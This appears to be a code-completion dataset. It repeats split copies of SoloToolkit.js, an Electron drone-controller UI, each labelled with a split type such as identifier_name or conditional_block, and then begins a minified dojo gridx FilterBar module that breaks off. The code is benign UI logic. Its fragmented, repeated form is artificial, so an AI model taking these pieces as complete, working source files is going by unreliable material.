Logger.log('info','view_system_info()');
let html = system_info_template(solo.versions);
$("#logs-view").hide();
$('#settings-view').hide();
$('#system-view').html(html);
$('#system-view').show();
remove_all_active_sidebar();
system_info_button.addClass('active');
$('#system_info_button > p').addClass('active');
};
let log_collection_button = $('#log_collection_button');
log_collection_button.click(()=>{load_log_collection()});
function load_log_collection(){
Logger.log('info',"load_log_collection()");
//Hide other views and show this one
$('#system-view').hide();
$('#settings-view').hide();
$("#logs-view").show();
remove_all_active_sidebar();
log_collection_button.addClass('active');
$('#log_collection_button > p').addClass('active');
};
let system_settings_button = $('#system_settings_button');
system_settings_button.click(()=>{load_settings()});
function load_settings(){
Logger.log('info',"load_settings()");
$('#system-view').hide();
$("#logs-view").hide();
$('#settings-view').show();
remove_all_active_sidebar();
system_settings_button.addClass('active');
$('#system_settings_button > p').addClass('active');
};
//IF enabled, this code will print the size of the window when it changes
// $(document).ready(()=>{
// function printSizes(){
// Logger.log('info',"Window size - height: " + window.outerHeight.toString() + " width: " + window.outerWidth.toString());
// }
// $(window).resize(printSizes, 1000);
// })
| //Takes an input html and then requests a dialog chooser
//When response received from main thread with path, this drops a value in the input
Logger.log('info',"getDirectory()");
let selected_dir = '';
ipcRenderer.send('open-dir-dialog');
//Listen for one return event to get the path back from the main thread
ipcRenderer.once('open-dir-dialog-reply', function(e, response){
if (response.length < 1) {
Logger.log('info',"cancelled directory open");
} else {
selected_dir = response[0];
input_element.val(selected_dir);
}
});
};
| identifier_body |
SoloToolkit.js | const ipcRenderer = require('electron').ipcRenderer;
const Device = require('./app/js/Device');
const Mousetrap = require('mousetrap');
const {remote} = require("electron");
//Solo + controller device
let solo = new Device(successConnecting, successDisconnecting, failureConnecting);
// Create Device instance for controller and device
solo.on('updated_versions', ()=>{
//Re-load the system info page when we get updated version info
if($('#system_info_button').hasClass('active')){ //if the system info mode is active, reload it to show the new data
view_system_info();
}
});
// Connect navbar and sidebar
let connect_button = $('#connect-button');
$("#connect-progress-bar").hide();
connect_button.on('click', connectButtonClicked);
function connectButtonClicked(){
Logger.info('Clicked connect button!');
if (!solo.controllerConnected && !solo.soloConnected){
Logger.log('info',"Solo connected: " + solo.soloConnected + " Controller connected: " + solo.controllerConnected);
solo.connect_to_controller();
//If controller connects successfully, connection to Solo is attempted.
connectButtonDisabled();
connect_button.prop("disabled", true);
$("#connect-progress-bar").show();
} else { //something is connected, we should disconnect from everything
solo.disconnect();
}
};
//Connection status callbacks
function successConnecting(device){
Logger.log('info',"Connected successfully to " + device);
//Update the connection info in the bottom right of the app
$("#" + device + "-connection-status").html(" connected");
$("." + device + "-connection").addClass("active");
connectButtonConnected(); //Update the connect button
if (device === "controller"){
//We're connected to controller successfully, so connect to Solo
solo.connect_to_solo();
};
};
function failureConnecting(device){
// Called if we encounter an error trying to connect to either Solo or controller
// Will display a 'failure connecting' message to the user
Logger.log('info',"Error or disconnection from " + device);
$("#" + device + "-connection-status").html(" disconnected");
$("." + device + "-connection").removeClass("active");
connection_error_message(device);
if (device === "controller"){
connectButtonEnabled();
}
};
function successDisconnecting(device, message){ | Logger.log('info',"Successfully disconnected from " + device);
$("#" + device + "-connection-status").html(" disconnected");
$("." + device + "-connection").removeClass("active");
if (device === "controller"){ //If we're not connected to controller, good chance we're not going to be connected to Solo
connectButtonEnabled();
solo.controllerConnected = false;
} else {
solo.soloConnected = false;
}
if (message){
display_overlay("connection", `Disconnected from ${message}`, `Check connections.`);
}
}
function connectButtonDisabled(){
connect_button.addClass('disabled');
connect_button.prop("disabled", true);
};
function connectButtonEnabled(){
connect_button.html('CONNECT');
connect_button.removeClass('disabled');
connect_button.prop("disabled", false);
$("#connect-progress-bar").hide();
};
function connectButtonConnected(){
//If we successfully conneced, switch the state of the connect button to enable disconnecting
connectButtonEnabled();
connect_button.html("Disconnect");
}
function connection_error_message(device_name){
if (device_name === "controller") {
display_overlay("connection","Could not connect to controller", "No connection to controller available. Check your wifi connection.");
} else {
display_overlay("connection", "Could not connect to Solo", "No connection to Solo is available. Try power cycling Solo.");
}
};
//OVERLAYS
let overlay_options = {
'keyboard': true, // teardown when <esc> key is pressed (default: true)
'static': false, // maintain overlay when clicked (default: false)
'onclose': function() {} // execute function when overlay is closed
};
function display_overlay(type, heading, body, options){
Logger.log('info',"display_overlay()");
/*param (String) type - type of modal (defaults to error)
Available types:
'error' - error dialog
'settings' – settings dialog
param {String} heading - heading for the modal
param {String} body - body text for the dialog
param {Object} options - optional options Object
Example -
{
image: "<img src='./app/assets/img/stick_cal.gif' class='settings-image' alt='stick calibration'>",
cancel_button: true, //off by default
confirm_button: true, //true by default
button_text: "Confirm"
}
*/
//determine the type of modal to display (error or setting)
let conformed_type = '';
type = type.toLowerCase().trim();
switch (type){
case "error":
conformed_type = 'warning';
break;
case "settings":
conformed_type = "settings";
break
case "connection":
conformed_type = "signal_wifi_off";
break;
}
let modal_dialog = document.createElement('div');
let modal_options = {
static: true
}
modal_dialog.style.width = '50%';
modal_dialog.style.height = 'fit-content';
modal_dialog.style.margin = '100px auto';
modal_dialog.style.backgroundColor = '#fff';
modal_dialog.innerHTML = modal_template({modal_type: conformed_type, modal_heading: heading, modal_body: body});
mui.overlay('on', modal_options, modal_dialog); //this inserts the div into the DOM and makes the optional-el div available to jquery
let optional_button = $('#optional-button');
let optional_image_el = $("#optional-image-el");
if (options){
Logger.log('info',"Overlay options passed: ");
Logger.log('info',options);
if (!options.cancel_button){
optional_button.hide();
}
if (options.button_text){
$('#modal-button').html(options.button_text);
}
if(options.image){
optional_image_el.html(options.image);
}
if(options.confirm_button == false){
$('#modal-button').hide();
}
} else {
Logger.log('info',"No options passed to display_overlay");
optional_button.hide();
optional_image_el.html('');
}
$("#modal-button").click(()=>{
Logger.log('info',"close dialog button clicked");
clear_overlay(modal_dialog);
});
};
function clear_overlay(){
Logger.log('info',"clear_overlay()");
//@param {Object} dialog - DOM element used to create an overlay, typically the modal_dialog
mui.overlay('off');
}
//FILE DIALOGS
function getDirectory(input_element){
//Takes an input html and then requests a dialog chooser
//When response received from main thread with path, this drops a value in the input
Logger.log('info',"getDirectory()");
let selected_dir = '';
ipcRenderer.send('open-dir-dialog');
//Listen for one return event to get the path back from the main thread
ipcRenderer.once('open-dir-dialog-reply', function(e, response){
if (response.length < 1) {
Logger.log('info',"cancelled directory open");
} else {
selected_dir = response[0];
input_element.val(selected_dir);
}
});
};
// Templates and views
$(document).ready(function load_templates(){
//Renders all templates on initialization and drops them into their divs
$('#system-view').html(system_info_template(solo.versions));
$('#logs-view').html(logs_template());
$('#settings-view').html(settings_template());
//switches the view to system info page on first run
view_system_info();
});
//Attach keyboard shortcuts
$(document).ready(()=>{
//No keyboard shortcuts attached yet
//Use Mousetrap to connect keyboard shortcuts
});
//SIDEBAR
//Toggle the active class on sidebar items
let remove_all_active_sidebar = function(){
Logger.log('info',"remove_all_active_sidebar");
//Generic helper for styling sidebar items
$("#system_info_button").removeClass('active');
$('#system_info_button >p').removeClass('active');
$("#log_collection_button").removeClass('active');
$('#log_collection_button >p').removeClass('active');
$("#system_settings_button").removeClass('active');
$('#system_settings_button >p').removeClass('active');
};
let system_info_button = $('#system_info_button');
system_info_button.click(()=>{view_system_info()});
function view_system_info(){
//If the info page is active, render the menu with the latest versions from the device object
Logger.log('info','view_system_info()');
let html = system_info_template(solo.versions);
$("#logs-view").hide();
$('#settings-view').hide();
$('#system-view').html(html);
$('#system-view').show();
remove_all_active_sidebar();
system_info_button.addClass('active');
$('#system_info_button > p').addClass('active');
};
let log_collection_button = $('#log_collection_button');
log_collection_button.click(()=>{load_log_collection()});
function load_log_collection(){
Logger.log('info',"load_log_collection()");
//Hide other views and show this one
$('#system-view').hide();
$('#settings-view').hide();
$("#logs-view").show();
remove_all_active_sidebar();
log_collection_button.addClass('active');
$('#log_collection_button > p').addClass('active');
};
let system_settings_button = $('#system_settings_button');
system_settings_button.click(()=>{load_settings()});
function load_settings(){
Logger.log('info',"load_settings()");
$('#system-view').hide();
$("#logs-view").hide();
$('#settings-view').show();
remove_all_active_sidebar();
system_settings_button.addClass('active');
$('#system_settings_button > p').addClass('active');
};
//IF enabled, this code will print the size of the window when it changes
// $(document).ready(()=>{
// function printSizes(){
// Logger.log('info',"Window size - height: " + window.outerHeight.toString() + " width: " + window.outerWidth.toString());
// }
// $(window).resize(printSizes, 1000);
// }) | // Called if we successfully disconnect from a device (like when Disconnect button pressed)
// Will not display a message to the user | random_line_split |
SoloToolkit.js | const ipcRenderer = require('electron').ipcRenderer;
const Device = require('./app/js/Device');
const Mousetrap = require('mousetrap');
const {remote} = require("electron");
//Solo + controller device
let solo = new Device(successConnecting, successDisconnecting, failureConnecting);
// Create Device instance for controller and device
solo.on('updated_versions', ()=>{
//Re-load the system info page when we get updated version info
if($('#system_info_button').hasClass('active')){ //if the system info mode is active, reload it to show the new data
view_system_info();
}
});
// Connect navbar and sidebar
let connect_button = $('#connect-button');
$("#connect-progress-bar").hide();
connect_button.on('click', connectButtonClicked);
function connectButtonClicked(){
Logger.info('Clicked connect button!');
if (!solo.controllerConnected && !solo.soloConnected){
Logger.log('info',"Solo connected: " + solo.soloConnected + " Controller connected: " + solo.controllerConnected);
solo.connect_to_controller();
//If controller connects successfully, connection to Solo is attempted.
connectButtonDisabled();
connect_button.prop("disabled", true);
$("#connect-progress-bar").show();
} else { //something is connected, we should disconnect from everything
solo.disconnect();
}
};
//Connection status callbacks
function successConnecting(device){
Logger.log('info',"Connected successfully to " + device);
//Update the connection info in the bottom right of the app
$("#" + device + "-connection-status").html(" connected");
$("." + device + "-connection").addClass("active");
connectButtonConnected(); //Update the connect button
if (device === "controller"){
//We're connected to controller successfully, so connect to Solo
solo.connect_to_solo();
};
};
function failureConnecting(device){
// Called if we encounter an error trying to connect to either Solo or controller
// Will display a 'failure connecting' message to the user
Logger.log('info',"Error or disconnection from " + device);
$("#" + device + "-connection-status").html(" disconnected");
$("." + device + "-connection").removeClass("active");
connection_error_message(device);
if (device === "controller"){
connectButtonEnabled();
}
};
function successDisconnecting(device, message){
// Called if we successfully disconnect from a device (like when Disconnect button pressed)
// Will not display a message to the user
Logger.log('info',"Successfully disconnected from " + device);
$("#" + device + "-connection-status").html(" disconnected");
$("." + device + "-connection").removeClass("active");
if (device === "controller"){ //If we're not connected to controller, good chance we're not going to be connected to Solo
connectButtonEnabled();
solo.controllerConnected = false;
} else |
if (message){
display_overlay("connection", `Disconnected from ${message}`, `Check connections.`);
}
}
function connectButtonDisabled(){
connect_button.addClass('disabled');
connect_button.prop("disabled", true);
};
function connectButtonEnabled(){
connect_button.html('CONNECT');
connect_button.removeClass('disabled');
connect_button.prop("disabled", false);
$("#connect-progress-bar").hide();
};
function connectButtonConnected(){
//If we successfully conneced, switch the state of the connect button to enable disconnecting
connectButtonEnabled();
connect_button.html("Disconnect");
}
function connection_error_message(device_name){
if (device_name === "controller") {
display_overlay("connection","Could not connect to controller", "No connection to controller available. Check your wifi connection.");
} else {
display_overlay("connection", "Could not connect to Solo", "No connection to Solo is available. Try power cycling Solo.");
}
};
//OVERLAYS
let overlay_options = {
'keyboard': true, // teardown when <esc> key is pressed (default: true)
'static': false, // maintain overlay when clicked (default: false)
'onclose': function() {} // execute function when overlay is closed
};
function display_overlay(type, heading, body, options){
Logger.log('info',"display_overlay()");
/*param (String) type - type of modal (defaults to error)
Available types:
'error' - error dialog
'settings' – settings dialog
param {String} heading - heading for the modal
param {String} body - body text for the dialog
param {Object} options - optional options Object
Example -
{
image: "<img src='./app/assets/img/stick_cal.gif' class='settings-image' alt='stick calibration'>",
cancel_button: true, //off by default
confirm_button: true, //true by default
button_text: "Confirm"
}
*/
//determine the type of modal to display (error or setting)
let conformed_type = '';
type = type.toLowerCase().trim();
switch (type){
case "error":
conformed_type = 'warning';
break;
case "settings":
conformed_type = "settings";
break
case "connection":
conformed_type = "signal_wifi_off";
break;
}
let modal_dialog = document.createElement('div');
let modal_options = {
static: true
}
modal_dialog.style.width = '50%';
modal_dialog.style.height = 'fit-content';
modal_dialog.style.margin = '100px auto';
modal_dialog.style.backgroundColor = '#fff';
modal_dialog.innerHTML = modal_template({modal_type: conformed_type, modal_heading: heading, modal_body: body});
mui.overlay('on', modal_options, modal_dialog); //this inserts the div into the DOM and makes the optional-el div available to jquery
let optional_button = $('#optional-button');
let optional_image_el = $("#optional-image-el");
if (options){
Logger.log('info',"Overlay options passed: ");
Logger.log('info',options);
if (!options.cancel_button){
optional_button.hide();
}
if (options.button_text){
$('#modal-button').html(options.button_text);
}
if(options.image){
optional_image_el.html(options.image);
}
if(options.confirm_button == false){
$('#modal-button').hide();
}
} else {
Logger.log('info',"No options passed to display_overlay");
optional_button.hide();
optional_image_el.html('');
}
$("#modal-button").click(()=>{
Logger.log('info',"close dialog button clicked");
clear_overlay(modal_dialog);
});
};
function clear_overlay(){
Logger.log('info',"clear_overlay()");
//@param {Object} dialog - DOM element used to create an overlay, typically the modal_dialog
mui.overlay('off');
}
//FILE DIALOGS
function getDirectory(input_element){
//Takes an input html and then requests a dialog chooser
//When response received from main thread with path, this drops a value in the input
Logger.log('info',"getDirectory()");
let selected_dir = '';
ipcRenderer.send('open-dir-dialog');
//Listen for one return event to get the path back from the main thread
ipcRenderer.once('open-dir-dialog-reply', function(e, response){
if (response.length < 1) {
Logger.log('info',"cancelled directory open");
} else {
selected_dir = response[0];
input_element.val(selected_dir);
}
});
};
// Templates and views
$(document).ready(function load_templates(){
//Renders all templates on initialization and drops them into their divs
$('#system-view').html(system_info_template(solo.versions));
$('#logs-view').html(logs_template());
$('#settings-view').html(settings_template());
//switches the view to system info page on first run
view_system_info();
});
//Attach keyboard shortcuts
$(document).ready(()=>{
//No keyboard shortcuts attached yet
//Use Mousetrap to connect keyboard shortcuts
});
//SIDEBAR
//Toggle the active class on sidebar items
let remove_all_active_sidebar = function(){
Logger.log('info',"remove_all_active_sidebar");
//Generic helper for styling sidebar items
$("#system_info_button").removeClass('active');
$('#system_info_button >p').removeClass('active');
$("#log_collection_button").removeClass('active');
$('#log_collection_button >p').removeClass('active');
$("#system_settings_button").removeClass('active');
$('#system_settings_button >p').removeClass('active');
};
let system_info_button = $('#system_info_button');
system_info_button.click(()=>{view_system_info()});
function view_system_info(){
//If the info page is active, render the menu with the latest versions from the device object
Logger.log('info','view_system_info()');
let html = system_info_template(solo.versions);
$("#logs-view").hide();
$('#settings-view').hide();
$('#system-view').html(html);
$('#system-view').show();
remove_all_active_sidebar();
system_info_button.addClass('active');
$('#system_info_button > p').addClass('active');
};
let log_collection_button = $('#log_collection_button');
log_collection_button.click(()=>{load_log_collection()});
function load_log_collection(){
Logger.log('info',"load_log_collection()");
//Hide other views and show this one
$('#system-view').hide();
$('#settings-view').hide();
$("#logs-view").show();
remove_all_active_sidebar();
log_collection_button.addClass('active');
$('#log_collection_button > p').addClass('active');
};
let system_settings_button = $('#system_settings_button');
system_settings_button.click(()=>{load_settings()});
function load_settings(){
Logger.log('info',"load_settings()");
$('#system-view').hide();
$("#logs-view").hide();
$('#settings-view').show();
remove_all_active_sidebar();
system_settings_button.addClass('active');
$('#system_settings_button > p').addClass('active');
};
//IF enabled, this code will print the size of the window when it changes
// $(document).ready(()=>{
// function printSizes(){
// Logger.log('info',"Window size - height: " + window.outerHeight.toString() + " width: " + window.outerWidth.toString());
// }
// $(window).resize(printSizes, 1000);
// })
| {
solo.soloConnected = false;
} | conditional_block |
SoloToolkit.js | const ipcRenderer = require('electron').ipcRenderer;
const Device = require('./app/js/Device');
const Mousetrap = require('mousetrap');
const {remote} = require("electron");
//Solo + controller device
let solo = new Device(successConnecting, successDisconnecting, failureConnecting);
// Create Device instance for controller and device
solo.on('updated_versions', ()=>{
//Re-load the system info page when we get updated version info
if($('#system_info_button').hasClass('active')){ //if the system info mode is active, reload it to show the new data
view_system_info();
}
});
// Connect navbar and sidebar
let connect_button = $('#connect-button');
$("#connect-progress-bar").hide();
connect_button.on('click', connectButtonClicked);
function connectButtonClicked(){
Logger.info('Clicked connect button!');
if (!solo.controllerConnected && !solo.soloConnected){
Logger.log('info',"Solo connected: " + solo.soloConnected + " Controller connected: " + solo.controllerConnected);
solo.connect_to_controller();
//If controller connects successfully, connection to Solo is attempted.
connectButtonDisabled();
connect_button.prop("disabled", true);
$("#connect-progress-bar").show();
} else { //something is connected, we should disconnect from everything
solo.disconnect();
}
};
//Connection status callbacks
function successConnecting(device){
Logger.log('info',"Connected successfully to " + device);
//Update the connection info in the bottom right of the app
$("#" + device + "-connection-status").html(" connected");
$("." + device + "-connection").addClass("active");
connectButtonConnected(); //Update the connect button
if (device === "controller"){
//We're connected to controller successfully, so connect to Solo
solo.connect_to_solo();
};
};
function failureConnecting(device){
// Called if we encounter an error trying to connect to either Solo or controller
// Will display a 'failure connecting' message to the user
Logger.log('info',"Error or disconnection from " + device);
$("#" + device + "-connection-status").html(" disconnected");
$("." + device + "-connection").removeClass("active");
connection_error_message(device);
if (device === "controller"){
connectButtonEnabled();
}
};
function successDisconnecting(device, message){
// Called if we successfully disconnect from a device (like when Disconnect button pressed)
// Will not display a message to the user
Logger.log('info',"Successfully disconnected from " + device);
$("#" + device + "-connection-status").html(" disconnected");
$("." + device + "-connection").removeClass("active");
if (device === "controller"){ //If we're not connected to controller, good chance we're not going to be connected to Solo
connectButtonEnabled();
solo.controllerConnected = false;
} else {
solo.soloConnected = false;
}
if (message){
display_overlay("connection", `Disconnected from ${message}`, `Check connections.`);
}
}
function connectButtonDisabled(){
connect_button.addClass('disabled');
connect_button.prop("disabled", true);
};
function connectButtonEnabled(){
connect_button.html('CONNECT');
connect_button.removeClass('disabled');
connect_button.prop("disabled", false);
$("#connect-progress-bar").hide();
};
function | (){
//If we successfully conneced, switch the state of the connect button to enable disconnecting
connectButtonEnabled();
connect_button.html("Disconnect");
}
function connection_error_message(device_name){
if (device_name === "controller") {
display_overlay("connection","Could not connect to controller", "No connection to controller available. Check your wifi connection.");
} else {
display_overlay("connection", "Could not connect to Solo", "No connection to Solo is available. Try power cycling Solo.");
}
};
//OVERLAYS
let overlay_options = {
'keyboard': true, // teardown when <esc> key is pressed (default: true)
'static': false, // maintain overlay when clicked (default: false)
'onclose': function() {} // execute function when overlay is closed
};
function display_overlay(type, heading, body, options){
Logger.log('info',"display_overlay()");
/*param (String) type - type of modal (defaults to error)
Available types:
'error' - error dialog
'settings' – settings dialog
param {String} heading - heading for the modal
param {String} body - body text for the dialog
param {Object} options - optional options Object
Example -
{
image: "<img src='./app/assets/img/stick_cal.gif' class='settings-image' alt='stick calibration'>",
cancel_button: true, //off by default
confirm_button: true, //true by default
button_text: "Confirm"
}
*/
//determine the type of modal to display (error or setting)
let conformed_type = '';
type = type.toLowerCase().trim();
switch (type){
case "error":
conformed_type = 'warning';
break;
case "settings":
conformed_type = "settings";
break
case "connection":
conformed_type = "signal_wifi_off";
break;
}
let modal_dialog = document.createElement('div');
let modal_options = {
static: true
}
modal_dialog.style.width = '50%';
modal_dialog.style.height = 'fit-content';
modal_dialog.style.margin = '100px auto';
modal_dialog.style.backgroundColor = '#fff';
modal_dialog.innerHTML = modal_template({modal_type: conformed_type, modal_heading: heading, modal_body: body});
mui.overlay('on', modal_options, modal_dialog); //this inserts the div into the DOM and makes the optional-el div available to jquery
let optional_button = $('#optional-button');
let optional_image_el = $("#optional-image-el");
if (options){
Logger.log('info',"Overlay options passed: ");
Logger.log('info',options);
if (!options.cancel_button){
optional_button.hide();
}
if (options.button_text){
$('#modal-button').html(options.button_text);
}
if(options.image){
optional_image_el.html(options.image);
}
if(options.confirm_button == false){
$('#modal-button').hide();
}
} else {
Logger.log('info',"No options passed to display_overlay");
optional_button.hide();
optional_image_el.html('');
}
$("#modal-button").click(()=>{
Logger.log('info',"close dialog button clicked");
clear_overlay(modal_dialog);
});
};
function clear_overlay(){
Logger.log('info',"clear_overlay()");
//@param {Object} dialog - DOM element used to create an overlay, typically the modal_dialog
mui.overlay('off');
}
//FILE DIALOGS
function getDirectory(input_element){
//Takes an input html and then requests a dialog chooser
//When response received from main thread with path, this drops a value in the input
Logger.log('info',"getDirectory()");
let selected_dir = '';
ipcRenderer.send('open-dir-dialog');
//Listen for one return event to get the path back from the main thread
ipcRenderer.once('open-dir-dialog-reply', function(e, response){
if (response.length < 1) {
Logger.log('info',"cancelled directory open");
} else {
selected_dir = response[0];
input_element.val(selected_dir);
}
});
};
// Templates and views
$(document).ready(function load_templates(){
//Renders all templates on initialization and drops them into their divs
$('#system-view').html(system_info_template(solo.versions));
$('#logs-view').html(logs_template());
$('#settings-view').html(settings_template());
//switches the view to system info page on first run
view_system_info();
});
//Attach keyboard shortcuts
$(document).ready(()=>{
//No keyboard shortcuts attached yet
//Use Mousetrap to connect keyboard shortcuts
});
//SIDEBAR
//Toggle the active class on sidebar items
let remove_all_active_sidebar = function(){
Logger.log('info',"remove_all_active_sidebar");
//Generic helper for styling sidebar items
$("#system_info_button").removeClass('active');
$('#system_info_button >p').removeClass('active');
$("#log_collection_button").removeClass('active');
$('#log_collection_button >p').removeClass('active');
$("#system_settings_button").removeClass('active');
$('#system_settings_button >p').removeClass('active');
};
let system_info_button = $('#system_info_button');
system_info_button.click(()=>{view_system_info()});
function view_system_info(){
//If the info page is active, render the menu with the latest versions from the device object
Logger.log('info','view_system_info()');
let html = system_info_template(solo.versions);
$("#logs-view").hide();
$('#settings-view').hide();
$('#system-view').html(html);
$('#system-view').show();
remove_all_active_sidebar();
system_info_button.addClass('active');
$('#system_info_button > p').addClass('active');
};
let log_collection_button = $('#log_collection_button');
log_collection_button.click(()=>{load_log_collection()});
function load_log_collection(){
Logger.log('info',"load_log_collection()");
//Hide other views and show this one
$('#system-view').hide();
$('#settings-view').hide();
$("#logs-view").show();
remove_all_active_sidebar();
log_collection_button.addClass('active');
$('#log_collection_button > p').addClass('active');
};
let system_settings_button = $('#system_settings_button');
system_settings_button.click(()=>{load_settings()});
function load_settings(){
Logger.log('info',"load_settings()");
$('#system-view').hide();
$("#logs-view").hide();
$('#settings-view').show();
remove_all_active_sidebar();
system_settings_button.addClass('active');
$('#system_settings_button > p').addClass('active');
};
//IF enabled, this code will print the size of the window when it changes
// $(document).ready(()=>{
// function printSizes(){
// Logger.log('info',"Window size - height: " + window.outerHeight.toString() + " width: " + window.outerWidth.toString());
// }
// $(window).resize(printSizes, 1000);
// })
| connectButtonConnected | identifier_name |
FilterBar.js | //>>built
require({cache:{"url:gridx/templates/FilterBar.html":"<input type=\"button\" data-dojo-type=\"dijit.form.Button\" data-dojo-props=\"\n\ticonClass: 'gridxFilterBarBtnIcon',\n\tlabel: '...',\n\ttitle: '${defineFilter}'\" aria-label='${defineFilter}'\n/><div class=\"gridxFilterBarStatus\"\n\t><span>${noFilterApplied}</span\n\t><span class=\"gridxFilterBarCloseBtn\" tabindex=\"-1\" title=\"${closeFilterBarBtn}\"><span class=\"gridxFilterBarCloseBtnText\">x</span></span\n></div>\n"}});
define("gridx/modules/filter/FilterBar",["dojo/_base/declare","dijit/registry","dojo/_base/lang","dojo/_base/array","dojo/_base/event","dojo/dom-construct","dojo/dom-attr","dojo/dom-class","dojo/string","dojo/parser","dojo/query","../../core/_Module","dojo/text!../../templates/FilterBar.html","dojo/i18n!../../nls/FilterBar","./Filter","./FilterDialog","./FilterConfirmDialog","./FilterTooltip","dijit/TooltipDialog","dijit/popup","dijit/Tooltip","dijit/form/Button"],function(_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c,_d,_e,_f,_10,_11,_12){
return _1(_c,{name:"filterBar",forced:["filter"],getAPIPath:function(){
return {filterBar:this};
},closeFilterBarButton:true,defineFilterButton:true,tooltipDelay:300,maxRuleCount:0,ruleCountToConfirmClearFilter:2,conditions:{string:["equal","contain","startWith","endWith","notEqual","notContain","notStartWith","notEndWith","isEmpty"],number:["equal","greater","less","greaterEqual","lessEqual","notEqual","isEmpty"],date:["equal","before","after","range","isEmpty"],time:["equal","before","after","range","isEmpty"],"boolean":["equal","isEmpty"]},load:function(_13,_14){
var F=_f;
F.before=F.lessEqual;
F.after=F.greaterEqual;
this.closeFilterBarButton=this.arg("closeFilterBarButton")||this.closeFilterBarButton;
this.defineFilterButton=this.arg("defineFilterButton")||this.defineFilterButton;
this.tooltipDelay=this.arg("tooltipDelay")||this.tooltipDelay;
this.maxRuleCount=this.arg("maxRuleCount")||this.maxRuleCount;
this.ruleCountToConfirmClearFilter=this.arg("ruleCountToConfirmClearFilter")||this.ruleCountToConfirmClearFilter;
this.domNode=_6.create("div",{innerHTML:_9.substitute(_d,_e),"class":"gridxFilterBar"});
_a.parse(this.domNode);
_8.toggle(this.domNode,"gridxFilterBarHideCloseBtn",!this.closeFilterBarButton);
this.grid.vLayout.register(this,"domNode","headerNode",-1);
this._nls=_e;
this._initWidgets();
this._initFocus();
this.refresh();
this.connect(this.domNode,"onclick","onDomClick");
this.connect(this.domNode,"onmouseover","onDomMouseOver");
this.connect(this.domNode,"onmousemove","onDomMouseMove");
this.connect(this.domNode,"onmouseout","onDomMouseOut");
this.loaded.callback();
},onDomClick:function(e){
if(!e.target||!e.target.tagName){
return;
}
if(_7.get(e.target,"action")==="clear"){
this.clearFilter();
}else{
if(_8.contains(e.target,"gridxFilterBarCloseBtn")||_8.contains(e.target,"gridxFilterBarCloseBtnText")){
this.hide();
}else{
this.showFilterDialog();
}
}
},onDomMouseMove:function(e){
if(e&&e.target&&(_7.get(e.target,"action")==="clear"||this.btnFilter===dijit.getEnclosingWidget(e.target))){
return;
}
this._showTooltip(e);
},onDomMouseOver:function(e){
},onDomMouseOut:function(e){
window.setTimeout(_3.hitch(this,"_hideTooltip"),10);
},applyFilter:function(_15){
var F=_f,_16=[];
this.filterData=_15;
_4.forEach(_15.conditions,function(_17){
var _18="string";
if(_17.colId){
_18=this.grid.column(_17.colId).dataType();
_16.push(this._getFilterExpression(_17.condition,_17,_18,_17.colId));
}else{
var arr=[];
_4.forEach(this.grid.columns(),function(col){
if(!col.isFilterable()){
return;
}
arr.push(this._getFilterExpression(_17.condition,_17,_18,col.id));
},this);
_16.push(F.or.apply(F,arr));
}
},this);
var _19=(_15.type==="all"?F.and:F.or).apply(F,_16);
this.grid.filter.setFilter(_19);
var _1a=this;
this.model.when({}).then(function(){
_1a._currentSize=_1a.model.size();
_1a._totalSize=_1a.model._cache.size();
_1a._buildFilterState();
});
},confirmToExecute:function(_1b,_1c){
var max=this.ruleCountToConfirmClearFilter;
if(this.filterData&&(this.filterData.conditions.length>=max||max<=0)){
if(!this._cfmDlg){
this._cfmDlg=new _11();
}
this._cfmDlg.execute=_3.hitch(_1c,_1b);
this._cfmDlg.show();
}else{
_1b.apply(_1c);
}
},clearFilter:function(_1d){
if(!_1d){
this.confirmToExecute(_3.hitch(this,"clearFilter",true),this);
}else{
this.filterData=null;
this.grid.filter.setFilter();
this._buildFilterState();
}
},columnMixin:{isFilterable:function(){
return this.grid._columnsById[this.id].filterable!==false;
},setFilterable:function(_1e){
this.grid.filterBar._setFilterable(this.id,_1e);
return this;
},dataType:function(){
return (this.grid._columnsById[this.id].dataType||"string").toLowerCase();
},filterConditions:function(){
return this.grid.filterBar._getColumnConditions(this.id);
}},refresh:function(){
this.btnClose.style.display=this.closeFilterBarButton?"":"none";
this.btnFilter.style.display=this.defineFilterButton?"":"none";
},isVisible:function(){
return this.domNode.style.display!="none";
},show:function(){
this.domNode.style.display="block";
this.grid.vLayout.reLayout();
this.onShow();
},hide:function(){
this.domNode.style.display="none";
this.grid.vLayout.reLayout();
this._hideTooltip();
this.onHide();
},onShow:function(){
},onHide:function(){
},showFilterDialog:function(){
var dlg=this._filterDialog;
if(!dlg){
this._filterDialog=dlg=new _10({grid:this.grid});
}
if(dlg.open){
return;
}
if(!this.filterData){
dlg.setData(this.filterData);
}
dlg.show();
if(this.filterData){
dlg.setData(this.filterData);
}
},uninitialize:function(){
this._filterDialog&&this._filterDialog.destroyRecursive();
this.inherited(arguments);
_6.destroy(this.domNode);
},_getColumnConditions:function(_1f){
var _20,_21;
if(!_1f){
_20=[];
_21="string";
}else{
_20=this.grid._columnsById[_1f].disabledConditions||[];
_21=(this.grid._columnsById[_1f].dataType||"string").toLowerCase();
}
var ret=this.conditions[_21],_22={};
if(!ret){
ret=this.conditions["string"];
}
_4.forEach(_20,function(_23){
_22[_23]=true;
});
ret=_4.filter(ret,function(_24){
return !_22[_24];
});
return ret;
},_setFilterable:function(_25,_26){
var col=this.grid._columnsById[_25];
if(!col){
return;
}
if(col.filterable==!!_26){
return;
}
col.filterable=!!_26;
if(this.filterData){
var d=this.filterData,len=d.conditions.length;
d.conditions=_4.filter(d.conditions,function(c){
return c.colId!=_25;
});
if(len!=d.conditions.length){
this.applyFilter(d);
}
if(this._filterDialog.open){
this._filterDialog.setData(d);
}
}
},_initWidgets:function(){
this.btnFilter=_2.byNode(_b(".dijitButton",this.domNode)[0]);
this.btnClose=_b(".gridxFilterBarCloseBtn",this.domNode)[0];
this.statusNode=_b(".gridxFilterBarStatus",this.domNode)[0].firstChild;
_7.remove(this.btnFilter.focusNode,"aria-labelledby");
},_buildFilterState:function(){
var nls=this._nls;
if(!this.filterData||!this.filterData.conditions.length){
this.statusNode.innerHTML=nls.filterBarMsgNoFilterTemplate;
return;
}
this.statusNode.innerHTML=_9.substitute(nls.filterBarMsgHasFilterTemplate,[this._currentSize,this._totalSize,"items"])+" <a href=\"javascript:void(0);\" action=\"clear\" title=\"Clear filter\">Clear Filter</a>";
this._buildTooltip();
},_buildTooltip:function(){
if(!this._tooltip){
this._tooltip=new _12({grid:this.grid});
}
this._tooltip.buildContent();
},_showTooltip:function(evt,_27){
this._hideTooltip();
if(!this.filterData||!this.filterData.conditions||!this.filterData.conditions.length){
return;
